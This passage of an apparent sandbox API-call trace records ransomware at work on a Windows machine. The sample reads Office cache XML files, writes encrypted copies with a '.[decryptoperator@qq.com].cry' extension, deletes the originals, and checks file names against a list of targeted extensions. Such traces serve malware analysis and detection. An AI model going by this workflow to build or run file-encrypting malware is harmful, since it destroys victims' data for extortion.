Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0035.939] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.939] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.939] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.939] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.940] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.940] GetLastError () returned 0x0 [0035.940] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x391, lpOverlapped=0x0) returned 1 [0035.941] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0035.942] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.942] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.942] SetEndOfFile (hFile=0x190) returned 1 [0035.942] CloseHandle (hObject=0x190) returned 1 [0035.943] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.943] SetEndOfFile (hFile=0x19c) returned 1 [0035.943] CloseHandle (hObject=0x19c) returned 1 [0035.943] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.944] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0035.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.944] lstrlenW (lpString=".doc") returned 4 [0035.944] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString=".docx") returned 5 [0035.944] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.944] lstrlenW (lpString=".pdf") returned 4 [0035.944] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString=".xls") returned 4 [0035.944] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString=".xlsx") returned 5 [0035.944] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.944] lstrlenW (lpString=".ppt") returned 4 [0035.944] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.944] lstrlenW (lpString=".zip") returned 4 [0035.944] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.944] lstrlenW (lpString=".rar") returned 4 [0035.944] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString=".bz2") returned 4 [0035.944] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString=".7z") returned 3 [0035.944] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.944] lstrlenW (lpString=".dbf") returned 4 [0035.944] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.944] lstrlenW (lpString=".1cd") returned 4 [0035.944] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".jpg") returned 4 [0035.945] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".doc") returned 4 [0035.945] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString=".docx") returned 5 [0035.945] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.945] lstrlenW (lpString=".pdf") returned 4 [0035.945] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString=".xls") returned 4 [0035.945] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString=".xlsx") returned 5 [0035.945] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.945] lstrlenW (lpString=".ppt") returned 4 [0035.945] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".zip") returned 4 [0035.945] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.945] lstrlenW (lpString=".rar") returned 4 [0035.945] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString=".bz2") returned 4 [0035.945] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString=".7z") returned 3 [0035.945] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".dbf") returned 4 [0035.945] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".1cd") returned 4 [0035.945] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.945] lstrlenW (lpString=".jpg") returned 4 [0035.945] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.946] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.946] lstrlenW (lpString="Setup.xml") returned 9 [0035.946] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.946] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1452) returned 1 [0035.946] CloseHandle (hObject=0x19c) returned 1 [0035.946] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.946] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.946] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.946] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.946] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.946] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.946] GetLastError () returned 0x0 [0035.946] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0036.233] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0036.242] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.242] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.242] SetEndOfFile (hFile=0x190) returned 1 [0036.242] CloseHandle (hObject=0x190) returned 1 [0036.243] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.243] SetEndOfFile (hFile=0x19c) returned 1 [0036.243] CloseHandle (hObject=0x19c) returned 1 [0036.244] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.244] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.244] lstrlenW (lpString=".doc") returned 4 [0036.244] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.244] lstrlenW (lpString=".docx") returned 5 [0036.244] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.244] lstrlenW (lpString=".pdf") returned 4 [0036.244] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.244] lstrlenW (lpString=".xls") returned 4 [0036.244] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.244] lstrlenW (lpString=".xlsx") returned 5 [0036.244] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.244] lstrlenW (lpString=".ppt") returned 4 [0036.244] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString=".zip") returned 4 [0036.245] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.245] lstrlenW (lpString=".rar") returned 4 [0036.245] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString=".bz2") returned 4 [0036.245] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString=".7z") returned 3 [0036.245] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString=".dbf") returned 4 [0036.245] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString=".1cd") returned 4 [0036.245] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString=".jpg") returned 4 [0036.245] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.245] lstrlenW (lpString=".doc") returned 4 [0036.245] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString=".docx") returned 5 [0036.245] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.245] lstrlenW (lpString=".pdf") returned 4 [0036.245] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString=".xls") returned 4 [0036.245] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString=".xlsx") returned 5 [0036.245] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.245] lstrlenW (lpString=".ppt") returned 4 [0036.245] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.246] lstrlenW (lpString=".zip") returned 4 [0036.246] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.246] lstrlenW (lpString=".rar") returned 4 [0036.246] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.246] lstrlenW (lpString=".bz2") returned 4 [0036.246] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.246] lstrlenW (lpString=".7z") returned 3 [0036.246] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.246] lstrlenW (lpString=".dbf") returned 4 [0036.246] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.246] lstrlenW (lpString=".1cd") returned 4 [0036.246] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.246] lstrlenW (lpString=".jpg") returned 4 [0036.246] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.246] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.246] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0036.246] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0036.247] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=819) returned 1 [0036.247] CloseHandle (hObject=0x19c) returned 1 [0036.247] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0036.247] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.247] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0036.247] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.247] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.247] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0036.248] GetLastError () returned 0x0 [0036.248] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x333, lpOverlapped=0x0) returned 1 [0036.372] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x340, lpOverlapped=0x0) returned 1 [0036.373] ReadFile (in: hFile=0x19c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.373] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0036.373] SetEndOfFile (hFile=0x190) returned 1 [0036.373] CloseHandle (hObject=0x190) returned 1 [0036.374] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.374] SetEndOfFile (hFile=0x19c) returned 1 [0036.375] CloseHandle (hObject=0x19c) returned 1 [0036.375] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.375] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0036.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.375] lstrlenW (lpString=".doc") returned 4 [0036.375] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.375] lstrlenW (lpString=".docx") returned 5 [0036.375] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.375] lstrlenW (lpString=".pdf") returned 4 [0036.375] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.375] lstrlenW (lpString=".xls") returned 4 [0036.375] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.375] lstrlenW (lpString=".xlsx") returned 5 [0036.375] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.376] lstrlenW (lpString=".ppt") returned 4 [0036.376] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString=".zip") returned 4 [0036.376] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.376] lstrlenW (lpString=".rar") returned 4 [0036.376] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString=".bz2") returned 4 [0036.376] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString=".7z") returned 3 [0036.376] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString=".dbf") returned 4 [0036.376] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString=".1cd") returned 4 [0036.376] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString=".jpg") returned 4 [0036.376] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.376] lstrlenW (lpString=".doc") returned 4 [0036.376] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString=".docx") returned 5 [0036.376] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.376] lstrlenW (lpString=".pdf") returned 4 [0036.376] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString=".xls") returned 4 [0036.376] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.376] lstrlenW (lpString=".xlsx") returned 5 [0036.376] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.376] lstrlenW (lpString=".ppt") returned 4 [0036.376] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.377] lstrlenW (lpString=".zip") returned 4 [0036.377] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.377] lstrlenW (lpString=".rar") returned 4 [0036.377] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.377] lstrlenW (lpString=".bz2") returned 4 [0036.377] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.377] lstrlenW (lpString=".7z") returned 3 [0036.377] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.377] lstrlenW (lpString=".dbf") returned 4 [0036.377] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.377] lstrlenW (lpString=".1cd") returned 4 [0036.377] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0036.377] lstrlenW (lpString=".jpg") returned 4 [0036.377] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.377] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.377] lstrlenW (lpString="Setup.xml") returned 9 [0036.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all 